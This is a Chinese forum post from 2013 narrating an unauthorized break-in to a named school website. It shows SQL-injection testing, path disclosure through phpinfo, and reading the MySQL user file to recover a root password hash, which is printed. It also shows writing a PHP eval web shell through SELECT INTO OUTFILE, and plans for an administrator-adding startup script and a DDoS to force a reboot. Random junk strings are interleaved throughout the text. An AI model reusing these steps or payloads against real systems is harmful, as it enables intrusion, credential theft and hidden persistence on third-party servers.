第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏. {! l& z( o. L0 y+ ?2 D6 U0 b/ T$ [
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!
- m* ]( C% Q; p+ ?9 V u2 C! T5 }3 ^
. W4 {% a+ d7 |, l1 [. o8 ?2 o$ Z1 x1 \7 m
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 ) {7 L( j0 `( e b+ C4 x$ v
, y4 `0 c( z. F* W6 R* l
那么想可以直接写入shell ,getshell有几个条件:
4 [# n" T9 H5 w1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF
% i! W9 s I" A% ?
' t* L0 @' }/ T5 s4 J1 p& ^试着爆绝对路径: % S4 E: K2 O: P4 m- {" k
1./phpMyAdmin/index.php?lang[]=1 % _1 X A( D: o% r4 U+ }, }
2./phpMyAdmin/phpinfo.php , M; b1 \; y, ]5 F Y3 ?
3./load_file()
- u/ b ~4 X, b d* a; U7 M: d3 z4./phpmyadmin/themes/darkblue_orange/layout.inc.php . a% v' f/ P+ v( F& V, |" D
5./phpmyadmin/libraries/select_lang.lib.php + e: u+ h6 B2 `+ B8 ?
6./phpmyadmin/libraries/lect_lang.lib.php : M% N0 c8 o4 N2 x8 D
7./phpmyadmin/libraries/mcrypt.lib.php . [0 _2 n: g" C+ A
8./phpmyadmin/libraries/export/xls.php
) o. h$ j5 u$ E+ H& C8 d# k; G
6 s( J& @* u+ D, V4 l y2 n均不行...........................
/ S V8 V: i# l. S; P. ]+ L* I& y. ]/ O
御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php ; g/ }8 u/ D4 y. O
* N3 s D" v# {4 v; H6 z权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
; E3 t I6 ]( b! v: i- H5 \
. C& I8 |; g0 f! a2 Z9 d2 p7 ?: n默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败 ( V0 ^( {* t+ f4 `) S8 e' S# j' ]
$ |2 x" g$ q6 |* m- L3 W4 M敏感东西: http://202.103.49.66/Admincp.php 社工进不去........... $ |9 L! k7 y5 [& d Y i8 H8 A* \
- J) d- i& V/ e+ H, l6 T: K' X
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell 6 m# A& B: l3 `& R
9 l i8 K! w, R+ {7 d) n: e8 |http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini
& j4 e' Y: a. n% r! O/ H6 x, }6 f% M. S, N( A
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
1 q& V6 ?0 h4 {# \: N1 m4 E. h- S! P; }! S' [! s
成功读到root密码: 7 H/ ]* A) \9 S+ |
, }$ c) `2 m0 F17---- r(0072)
. L4 i8 n6 |. u: \$ f" p- a6 C18---- o(006f) 0 M4 U# B" Z M+ Z$ j
19---- o(006f)
3 r$ q) C, d' @6 F20---- t(0074)
4 D8 X2 i6 f; N U% M21---- *(002a)
6 l! ^* T( A. y t22---- 8(0038)
6 U3 e# v x/ J23---- 2(0032) 0 P0 r/ ^8 f7 g& E0 ^8 I5 a h6 \! s& J
24---- E(0045) " z5 C& D3 m# Q- ~$ z
25---- 1(0031)
4 h9 o4 b6 [6 E: N( I* @26---- C(0043)
# e d; ]! v$ J! U27---- 5(0035)
7 }0 j. j% h8 a8 N! }28---- 8(0038) # ~# [# X( p" E: C' ?) ?8 L/ w
29---- 2(0032) 0 n# O% ^ N; [0 D( L
30---- 8(0038)
4 W8 F/ @$ X+ {* r1 d31---- A(0041) 4 T% x/ w5 p4 U6 I; x
32---- 9(0039)
( p3 K0 ]" _+ w6 H6 w33---- B(0042)
8 d0 I c1 ~+ G+ y34---- 5(0035) 1 N7 I8 Z! {: T( [" V; h
35---- 4(0034) $ R( U% P0 t5 s/ j& u
36---- 8(0038) ! [& m( ]. n: O+ |- o
37---- 6(0036)
: o' g0 L2 \4 C* m& d3 ?! q+ Q38---- 4(0034) 1 ~( e' I; j8 \; b+ q3 r9 d
39---- 9(0039)
+ f' C4 x. f E0 Z40---- 1(0031) + ~" x- J1 E5 F+ o
41---- 1(0031)
- K) {! V2 N! M6 L9 p3 ` ^42---- 5(0035)
4 F# f- v( w1 z0 V: I7 f: ?43---- 3(0033)
0 C( r/ _5 O( _& b( N1 y3 h44---- 5(0035) 5 h- c4 k) y1 \2 }# i
45---- 9(0039) # {) R2 q- f' t( a
46---- 8(0038) ! [2 E' D, t8 A& A
47---- F(0046) 4 }: q Z$ j3 K# ~' U
48---- F(0046)
6 t2 H; c$ u" L* N49---- 4(0034) $ Z8 h! \$ e! B0 a/ Y2 f3 a4 S
50---- F(0046) 7 i z3 W/ q- K; U4 m3 h1 ~- C
51---- 0(0030) * ]9 V2 n8 h) W
52---- 3(0033) ' E/ X$ k$ r+ J% `
53---- 2(0032) ; y! X. K- k( \4 N0 ~( q
54---- A(0041) - F! b! T& S3 |
55---- 4(0034) 3 Z8 h& \9 O4 I
56---- A(0041)
) v+ ]8 n H2 e7 j5 ]6 O. M57---- B(0042) # _* | I6 w% F# @
58---- *(0044) 2 g4 y' u, Q, h1 d Q# G
59---- *(0035)
# o. M4 ^3 I" U6 Q9 c60---- *(0041) 4 x, q5 h* {8 B1 j' |
61---- *0032)
1 N, B4 W$ }/ T9 S# t, M
! [1 `7 ^) A. f. F" {解密后成功登陆phpmyamin
9 j' L3 r- g# n3 O% H1 V 4 |5 K" w- {7 K! D( f8 r; i
; I9 r, b* n7 Z$ Q2 l/ P* C
2 ~& ]1 a. M7 i2 a B6 U8 e
8 _ Z1 b. B1 R" w' M找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
/ @* l" O5 G8 W/ z! g( K, {6 Z) O
! D! t. w y" J' h! Y成功执行,拿下shell,菜刀连接: 2 f8 c. m; h: ~/ K3 ^9 R7 A
+ p2 m- y6 s9 H. E" ?
服务器不支持asp,aspx,php提权无果...................
' W+ q2 u9 L0 N
2 ^2 H, w+ T H8 I: ?* v6 a) |但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里: $ ]2 ]( D! y/ ^, N3 s5 ?
服务器上已经有个隐藏帐号了 ) X. q) B2 K3 }1 j3 f
别名 administrators
& d' v0 ~/ f- \1 U n7 Z9 s9 t注释 管理员对计算机/域有不受限制的完全访问权
6 L( N9 v4 ?# X* s) m9 K$ z2 _成员
$ F0 N( s+ q2 P-------------------------------------------------------------------------------
/ w. n6 L, Y, dadmin
m$ m/ F( C: T. f( @' u" aAdministrator
* k4 P! `1 \; R* W0 ?6 `8 L1 Oslipper$
2 t* x' v: }# Z: J$ ~# m7 s, @sqluser
2 O. e( K, l2 E; G0 ?" u( g命令成功完成。 2 i8 q7 L/ i- J' q$ n
/ ~% E3 s+ Z9 _: q6 G5 h T服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。3 n0 F7 E2 T$ {
3 T, [) J) c! @) w7 X: W" tddos服务器重启,不然就只能坐等服务器重启了...............................; P* C. Q% E# t- W
% a2 B! b+ G7 r8 i7 ^
4 o( N* h. g0 j3 [* C U | 
发表于 2013-1-11 21:32:15
收藏
支持
反对
发表于 2013-5-20 15:28:12
